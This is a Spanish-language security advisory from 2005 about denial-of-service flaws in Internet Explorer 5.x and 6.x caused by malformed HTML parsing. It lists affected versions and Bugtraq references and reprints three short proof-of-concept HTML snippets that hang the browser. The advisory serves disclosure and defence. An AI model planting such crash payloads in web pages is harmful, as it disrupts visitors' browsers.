Esta página es un servicio gratuito de Video Soft BBS - SUBSCRIBASE en nuestras listas de correo.
  

Busque su tema:

VSantivirus  Internet
Proporcionado por FreeFind

Video Soft BBS
Menú Principal
Anti Trojans
Antivirus
Hoaxes
Subscripciones
Otro software
Artículos
Links
Sugerencias
Sobre el BBS
Direcciones
Galería
Chat

       

DoS en Internet Explorer (análisis sintáctico HTML)
 
VSantivirus No. 1998 Año 9, miércoles 28 de diciembre de 2005

 DoS en Internet Explorer (análisis sintáctico HTML)
http://www.vsantivirus.com/vul-ie-html-parsing-271205.htm

Por Angela Ruiz
angela@videosoft.net.uy

Microsoft Internet Explorer es afectado por múltiples vulnerabilidades del tipo denegación de servicio (DoS), relacionados con el análisis sintáctico del código HTML (HTML parsing).

Un atacante puede explotar estos fallos, engañando a un usuario para que visite un sitio web construido maliciosamente de tal modo que al visualizar sus páginas el programa deje de responder.

No se requiere un exploit para que este problema se produzca.

Se han hecho públicas las siguientes pruebas de concepto:

Prueba 1:

> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN">
> </samp></colgroup><ul><font><menu> <code> <var>
> <sub><h2></fieldset>
> </kbd></frameset>
> </ins></map></noframes>
> </isindex>
> </code>
> </div></title>
> </del></var><isindex>
> <i>

Prueba 2:

> <acronym><dd><h5><applet></caption></applet><li></h1>

Prueba 3:

> <table datasrc=".">


Software vulnerable:

- Microsoft Internet Explorer 6.0 SP2
- Microsoft Internet Explorer 6.0 SP1
- Microsoft Internet Explorer 6.0
- Microsoft Internet Explorer 5.5 SP2
- Microsoft Internet Explorer 5.5 SP1
- Microsoft Internet Explorer 5.5
- Microsoft Internet Explorer 5.0.1 SP4
- Microsoft Internet Explorer 5.0.1 SP3
- Microsoft Internet Explorer 5.0.1 SP2
- Microsoft Internet Explorer 5.0.1 SP1
- Microsoft Internet Explorer 5.0.1


Solución:

No se conocen soluciones para este problema. Según el descubridor de las vulnerabilidades, Microsoft ha sido avisado y se espera que una futura actualización corrija este fallo.


Referencias:

Bugtraq ID: 16070
Microsoft Internet Explorer HTML Parsing Denial of Service Vulnerabilities
http://www.securityfocus.com/bid/16070/info

[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #1 (bugtraq@morph3us.org)
http://www.securityfocus.com/archive/1/420260

[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #2 (bugtraq@morph3us.org)
http://www.securityfocus.com/archive/1/420262

[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #3 (bugtraq@morph3us.org)
http://www.securityfocus.com/archive/1/420265


Créditos:

Christian Deneke <bugtraq@deneke.biz>






(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com

 

Copyright 1996-2005 Video Soft BBS